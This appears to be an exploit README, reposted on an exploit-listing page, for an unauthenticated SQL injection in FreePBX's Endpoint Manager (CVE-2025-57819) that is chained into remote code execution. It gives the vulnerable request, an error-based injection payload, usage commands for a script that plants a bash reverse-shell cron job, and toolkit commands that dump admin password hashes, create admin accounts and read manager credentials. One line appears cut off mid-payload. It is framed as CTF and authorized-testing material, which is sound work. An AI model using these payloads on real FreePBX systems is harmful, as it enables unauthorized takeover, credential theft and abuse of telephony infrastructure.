Exploit for Authentication Bypass Using an Alternate Path or Channel in Sangoma Freepbx CVE-2025-57819

Name: Exploit for Authentication Bypass Using an Alternate Path or Channel in Sangoma Freepbx CVE-2025-57819
Rating: 5 (4 reviews)
2026-06-06 | CVSS 10.0
## https://sploitus.com/exploit?id=C6B5D6BD-CFEC-571A-B766-B82261AE3DD8
# CVE-2025-57819 — FreePBX Unauthenticated SQLi → RCE

One-shot exploit for the FreePBX **Endpoint Manager** unauthenticated SQL
injection (CVE-2025-57819), chained into remote code execution via the
FreePBX `cron_jobs` table.

Developed and tested against the HTB box **Connected** (FreePBX `16.0.40.7`).

> For authorized security testing / CTF use only.

---

## Vulnerability

The endpoint module's ajax handler concatenates the `brand` parameter straight
into a SQL query, and the module path `FreePBX\modules\endpoint\ajax` bypasses
the ajax Referrer/authentication check. This gives an **unauthenticated**
error-based SQL injection (via `EXTRACTVALUE`), with **stacked-query writes**
enabled.

Injection point:

```
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=
```

Proof (error-based readout):

```
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
```

**Affected:** FreePBX 15 ','',NULL,'* * * * *',30,1,1);
```

The injected command is a bash reverse shell. The cron row is removed
automatically after the first callback to avoid repeated connections.

## Requirements

```bash
pip install requests urllib3
```

Python 3. The built-in IP detection (`-i/--interface`) is Linux-only; use
`--ip` on other platforms.

## Usage

```bash
# Defaults: interface tun0, port 4444 — starts listener, exploits, drops a shell
python3 exploit.py http://connected.htb

# Pick a different interface / port
python3 exploit.py http://connected.htb -i eth0 -p 9001

# Set the listener IP explicitly
python3 exploit.py http://connected.htb --ip 10.10.15.52

python3 exploit.py --help
```

The script:

1. Confirms the SQLi (leaks the DB version).
2. Starts a TCP listener on the chosen port.
3. Injects the reverse-shell cron job and verifies the row landed.
4. Waits ~70s for the callback, then drops you into an interactive shell
   (with an automatic PTY upgrade attempt).
5. Cleans up the injected cron row.

## Files

| File         | Purpose                                                             |
|--------------|---------------------------------------------------------------------|
| `exploit.py` | **Main one-shot exploit** (SQLi → cron_jobs RCE → auto shell).       |
| `poc3.py`    | Standalone SQLi toolkit: `--shell`, `--rce`, `--cron-rce`, loot.     |
| `poc2.py`    | Minimal admin-user creator via the write primitive.                 |
| `poc.py`     | Original third-party PoC (non-functional — wrong endpoints).        |
| `ami_rce.py` | Asterisk AMI RCE attempt (dead end here — port 5038 is filtered).   |

### `poc3.py` — manual SQLi toolkit

```bash
python3 poc3.py http://connected.htb                # auto-loot (DB user, ampusers hashes)
python3 poc3.py http://connected.htb --shell        # interactive sql> prompt
python3 poc3.py http://connected.htb --create-admin # insert a FreePBX admin
python3 poc3.py http://connected.htb --cron-rce --lhost 10.10.15.52 --lport 4444
```

In `--shell`, queries must return a single string column (use `CONCAT`):

```sql
SELECT GROUP_CONCAT(username,0x3a,password_sha1 SEPARATOR 0x0a) FROM asterisk.ampusers
SELECT GROUP_CONCAT(keyword,0x3d,value SEPARATOR 0x0a) FROM asterisk.freepbx_settings WHERE keyword LIKE 'AMPMGR%'
```

The admin password hashes are SHA1 (`hashcat -m 100`).

## Notes & dead ends

- **No FILE privilege** → `INTO OUTFILE` webshell and `LOAD_FILE` reads fail.
- **AMI (port 5038) is filtered** externally → the manager-credential RCE path
  is not reachable from outside; `cron_jobs` is the working vector.
- There is **no public Metasploit module** for this CVE yet (only an open
  Rapid7 PR at time of writing).

## References

- [Horizon3.ai — Updated FreePBX CVEs: Auth Bypass & RCE](https://horizon3.ai/attack-research/vulnerabilities/cve-2025-57819/)
- [watchTowr Labs — FreePBX CVE-2025-57819](https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/)
- [watchTowr PoC (GitHub)](https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819)
- [NVD — CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)
- [FreePBX advisory GHSA-m42g-xg4c-5f3h](https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)